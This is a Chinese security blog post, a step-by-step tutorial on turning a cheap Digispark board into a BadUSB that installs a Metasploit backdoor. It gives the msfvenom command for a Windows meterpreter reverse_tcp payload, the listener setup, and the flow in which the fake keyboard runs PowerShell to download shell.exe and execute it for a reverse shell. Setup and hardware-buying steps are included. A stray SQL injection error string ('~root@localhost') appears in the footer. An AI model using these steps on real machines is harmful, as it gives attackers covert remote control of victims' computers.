当前位置:首页 > 日常学习 > 正文内容

用Digispark制作BadUSB+msf植入病毒木马

UzJu2年前 (2022-04-16)日常学习786

用Digispark制作BadUSB+msf植入病毒木马

febd5266145aad6fbacdd1f73d3e2263.jfif

0x001-简介

  1. 概述 在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态。

  2. ‍‍2. USB如何识别

af73a09231146f6efb10b5c740220e6d.jfif

  1. USB设备的初始化

49b7dc857a245c203b80916090370e2a.jfif

4.Badusb内部结构 从这张图便可以了解到–Badusb和普通的U盘并没有什么两样,因此迷惑性极高,很容易攻击成功

f5082cdcad3a2f3432e603909dadf6e3.jfif

5.Badusb Hid攻击原理

HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行。简而言之,今天要介绍的Badusb利用的是虚拟键盘来实现恶意代码的执行。

6.Badusb攻击优势

攻击者将恶意代码存放于Badusb的固件中,PC上的杀毒软件无法访问到U盘存放固件的区域,因此也就意味着杀毒软件无法应对BadUSB的攻击。

7.Teensy

攻击者在定制攻击设备时,会向USB设备中置入一个攻击芯片,此攻击芯片是一个非常小而且功能完整的单片机开发系统,它的名字叫TEENSY。通过TEENSY你可以模拟出一个键盘和鼠标,当你插入这个定制的USB设备时,电脑会识别为一个键盘,利用设备中的微处理器与存储空间和编程进去的攻击代码,就可以向主机发送控制命令,从而完全控制主机,无论自动播放是否开启,都可以成功。

ba7db4996e8f811f5417cda952567a10.jfif

0x002

1.Arduino是一款便捷灵活、方便上手的开源电子原型平台。其开发环境,主要包含两个主要的部分:硬件部分是可以用来做电路连接的Arduino电路板;另外一个则是Arduino IDE,你的计算机中的程序开发环境。你只要在IDE中编写程序代码,将程序上传到Arduino电路板后,程序便会告诉Arduino电路板要做些什么了。

5dde38361d199031b8f5715318821ead.jfif

2.攻击流程

Bad-Usb插入后,会模拟键盘对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载恶意代码(通常为powershell脚本)并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。

d5d8f70a531f8649cbc7898976cd2738.jfif

2.购买硬件

淘宝随便花个十块钱捡破烂

d4ad1b11d09d3c5df8c5b4038ae0b7d5.jfif

实体

1a14719418bdf2e0d542a81a93459a83.jfif

b31f28e6ff5951aa4ed8dcbf4873d820.jfif

0x003 开发环境安装 Arduino IDE

7f67845dc84efbb4a48d4b068a20ec7d.jfif

Arduino下载: https://www.arduino.cc/en/Main/Software

Digispark驱动程序 (Windows):https://github.com/digistump/DigistumpArduino/releases

配置Arduino IDE

打开 文件->首选项

把这个网址添加到附加开发板管理网址

https://raw.githubusercontent.com/digistump/arduino-boards-index/master/package_digistump_index.json

7fb0b658e56bf1b5f3a3f63134f84dfe.jfif

在Arduino中添加Digispark的支持

等待开发板管理器加载完成,搜索digistump并安装第一个Digistump AVR Boards

b079b6b913fb5d703f15558883e17702.jfif

如果你没有安装 这里显示的是安装 点击安装即可

安装Windows下的驱动

打开上面的链接,下载Digistump.Drivers

6f9e42533b1fde56c935632885918abd.jfif

解压后执行Install Drivers.exe即可

5292054b3601bee63d04c4b631447c9e.jfif

0x004 测试阶段

使用kali linux生成一个Payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f exe > shell.exe

然后打开kali linux 终端输入msfconsole

b986ba501c0e24bf53a7f774f7dde3d4.jfif

设置好监听

使用phpstudy搭建一个本地的环境

8b7696c9758a0db1f3f6d4ad85988c50.jfif

然后此后门的下载链接就是:127.0.0.1/shell.exe

打开Arduino

重点就是使用powershell下载

1f7ecaa48d5d771a36706ad1cb68440c.jfif

接着插上USB 然后先点击验证编译

a03288fc21986a8491f188a4a6ffbbc1.jfif

验证完整后下方会提示

983b5da1dbcd4532f88e3d5effd95914.jfif

接下来点击上传即可

6e61afdf3dd712a29e826610ef547be6.jfif

f9ef69c6588065e09059170bc28171bc.jfif

完事 接下来 这个上传完成后就会自动运行 所以需要拔掉再插

0x005 测试GIF

04ca6acf3e0de6433a9425e468426ce4.gif

GIF首先点击了上传(已经插入USB)上传完成后 自动运行 下载后门后 反弹回话!

GLHF!

扫描二维码推送至手机访问。

版权声明:本文由UzJu的安全屋发布,如需转载请注明出处。

SQL ERROR: ERROR 1105 (HY000): XPATH syntax error: '~root@localhost'

本文链接:https://uzzju.com/post/29.java

分享给朋友:

相关文章

博客同步腾讯云

我的博客即将同步至腾讯云+社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=3oa4dnff6cqog...

打算在博客开个专栏写写逻辑漏洞的思考:)

做漏洞审核也有快1年,大大小小的逻辑漏洞,也见的差不多, 接触到很多,想总结总结,并思考其中存在的问题和修复方式。...

等了1个月的CVE编号终于下来了,看来CNVD审核更快

等了1个月的CVE编号终于下来了,看来CNVD审核更快

我都快忘了什么时候申请的了。。。今晚看着电脑突然收到邮件,回复了我2个CVE编号给了两个编号,还不错,我都忘了我交了俩,一个前台洞,一个后台。。。。还是cnvd审核快...

ipad远程MacBookPro远程办公的终极解决方案

ipad远程MacBookPro远程办公的终极解决方案

吐槽作为安全技术人员来说,用ipad远程控制MacBook Pro,在我看来是一件很酷的事情!:) 首先吐槽一下自己为什么会有这个奇怪的想法,原因是因为,目前我有一个16寸的mac,我每天下班的第一个动作就是先把扩展坞拔掉,随后从扩展坞上...

MacOS下高效记录会议纪要以及实时音频转文字解决方案

MacOS下高效记录会议纪要以及实时音频转文字解决方案

一、前言本文解决了1个问题 1、如何同时带着耳机,并且能够音频识别电脑播放/会议声音转文字,还能够接收麦克风。 首先为什么会有这样一篇文章,其实大家不管是甲方还是乙方,特别是甲方,大部分时间其实都是被各种会议占满,需求评审,安全评估,安...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。